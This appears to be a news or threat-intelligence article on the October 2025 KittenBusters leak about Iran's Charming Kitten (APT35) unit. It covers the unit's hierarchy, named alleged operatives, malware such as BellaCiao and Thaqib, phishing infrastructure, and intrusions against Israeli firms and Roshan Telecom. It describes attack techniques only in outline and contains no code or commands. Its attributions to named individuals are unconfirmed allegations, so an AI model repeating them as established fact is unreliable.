In October 2025, one of the most extensive leaks in the history of Iranian cyber operations began circulating online. The exposed materials — published by an anonymous account under the name KittenBusters — unravel the internal structure, tools, and personnel of Charming Kitten, a state-sponsored cyber unit operating under the Intelligence Organization of the Islamic Revolutionary Guard Corps (IRGC-IO).
What was long suspected through scattered cybersecurity reports now appears to be confirmed by internal evidence: Charming Kitten is not a loose hacker group but a formal division of Iran’s counterintelligence apparatus.
From “APT35” to Unit 1500
Western cybersecurity companies have tracked this actor for over a decade under aliases such as APT35, Phosphorus, or Newscaster. The leaks now identify it as Department 40 of the IRGC-IO’s Counterintelligence Division (Unit 1500) — a dedicated branch tasked with digital infiltration, psychological operations, and monitoring of political and civil-society targets inside and outside Iran.
Documents in the first episodes reveal a detailed hierarchy. At the top stands Abbas Rahrovi (alias Abbas Hosseini), an IRGC official with multiple front companies registered in Iran. Below him, employees handle daily tasks ranging from malware development and penetration testing to social-media manipulation and open-source reconnaissance.
Malware Arsenal and Technical Capabilities
The leaked source code includes a series of custom remote-access and espionage tools. Among them is BellaCiao, previously analyzed by Bitdefender, a .NET-based dropper capable of delivering C# webshells or PowerShell scripts that establish reverse proxies through Plink. Another component, codenamed Thaqib, uses encryption and routing through the TOR network to conceal command-and-control servers, coupled with strong anti-debugging and anti-analysis features designed to evade antivirus detection (FUD; fully undetectable builds).
Other scripts and logs show training exercises on antivirus evasion, file-obfuscation techniques, and behavioral testing against commercial security products. Together, these tools demonstrate a level of maturity uncommon in regional threat actors, revealing a sustained investment in research and internal QA processes, hallmarks of a formal military program rather than a freelance hacking crew.
Human Infrastructure Behind the Code
Perhaps the most revealing aspect of the leak is the visibility it provides into the human side of the operation. Daily work reports recovered from Department 40’s internal network detail the routine tasks of engineers and content operators.
- Majid (MJD) led the team responsible for building and scheduling fake social-media accounts across Instagram, X, Facebook, and YouTube. He coordinated content approval with management and received payments through an office labeled “Daftar Elahiyeh” — indicating a central administrative hub in northern Tehran. In July 2024, he also monitored Arabic and English media about Mohammed bin Zayed, the ruler of the UAE, suggesting an effort to shape regional narratives.
- Hossein (HSN) managed phishing infrastructure. His reports describe configuring MailWizz servers, integrating Amazon SES/SNS for mass email delivery, and developing an internal “RTM” (Remote Task Module) capable of brute-force or multi-threaded execution — a blend of marketing-automation and intrusion tooling.
- Mahyar (MHX) focused on OSINT collection using platforms like Shodan, ZoomEye, and FOFA to map potential targets, including telecommunications firms in the Gulf and Levant. His workflow documents cross-reference Israeli corporate data and employee lists — a clear bridge between open-source reconnaissance and active targeting.
- Hesam, Shayan, and Amirhossein appear as penetration testers and exploit developers. Their logs show practical exercises exploiting vulnerabilities in GitLab, Confluence, Jenkins, and even network routers. In one case, Shayan achieved remote-code execution on an Israeli domain and deployed a webshell before erasing logs — a level of tradecraft consistent with state-sponsored operations.
Regional Targeting and the Roshan Operation
Beyond Israel and the Gulf, leaked folders labeled “Roshan” suggest operations against Roshan Telecom, Afghanistan’s largest mobile operator. The directory contained SQL-injection logs, internal table dumps, and user lists bearing the prefix “ROSHAN\”. Such data could facilitate credential harvesting and social-engineering attacks against Afghan users and journalists.
While attribution remains under analysis, the format and language of the logs align with Department 40’s internal coding conventions, making it one of the first direct links between the IRGC’s cyber units and Afghan telecom surveillance.
Why This Matters
The Charming Kitten leaks collapse the plausible deniability that has long shielded Tehran’s cyber operations. For years, Iran’s government portrayed hacking incidents as either Western fabrications or the work of patriotic volunteers. The internal documents, chat logs, and payment records now point to an institutional structure, with payrolls, project tracking, and explicit managerial oversight, operating within the IRGC’s counterintelligence division.
These revelations also blur the line between espionage and domestic repression. The same infrastructure used to target Israeli companies or Western research institutes appears to monitor Iranian dissidents abroad and even manage online harassment campaigns. Charming Kitten’s “social-media” branch effectively functions as a propaganda arm integrated into the cyber command chain.
The Broader Pattern
This exposure follows years of growing evidence about Iran’s hybrid warfare strategy — combining information operations, cyberattacks, and influence campaigns under the Supreme Council of Cyberspace (SCC).
While Western cybersecurity firms often isolate each malware strain as a technical threat, the leaked internal materials reveal a single continuum: from reconnaissance and intrusion to psychological operations and narrative warfare.
What Comes Next
KittenBusters, the anonymous group behind the release, has announced that more episodes are forthcoming. If the next sets of documents confirm financial and communication links to other IRGC-affiliated entities, it could open the door for new rounds of international sanctions and counter-espionage investigations.
For researchers, the Charming Kitten leaks are more than a window into Iran’s cyber command, they are a rare glimpse into the bureaucratic soul of digital authoritarianism: structured, methodical, and quietly ruthless.